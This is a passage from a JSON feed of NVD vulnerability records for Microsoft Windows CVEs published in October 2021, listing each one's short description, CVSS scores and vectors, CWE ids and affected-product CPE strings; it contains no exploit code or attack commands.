"cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2021-26442", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26442", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:16:49", "description": "Windows Kernel Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-41335", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41335"], "modified": "2021-10-19T16:59:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-41335", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41335", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:17:09", "description": "Windows Print Spooler Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-41332", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41332"], "modified": "2021-10-19T16:47:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-41332", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41332", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:14:29", "description": "Windows TCP/IP Denial of Service Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-36953", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36953"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-36953", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36953", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-05-23T19:14:19", "description": "Windows Installer Spoofing Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40455", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40455"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-40455", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40455", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-03-23T19:09:10", "description": "Windows DNS Server Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-40469", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40469"], "modified": "2021-10-19T14:28:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2022:-"], "id": "CVE-2021-40469", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40469", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:14:28", "description": "Windows Print Spooler Spoofing Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-36970", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36970"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2022:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-36970", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36970", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*"]}, {"lastseen": "2022-03-23T19:17:03", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40449, CVE-2021-40450.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T01:15:00", "type": "cve", "title": "CVE-2021-41357", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": 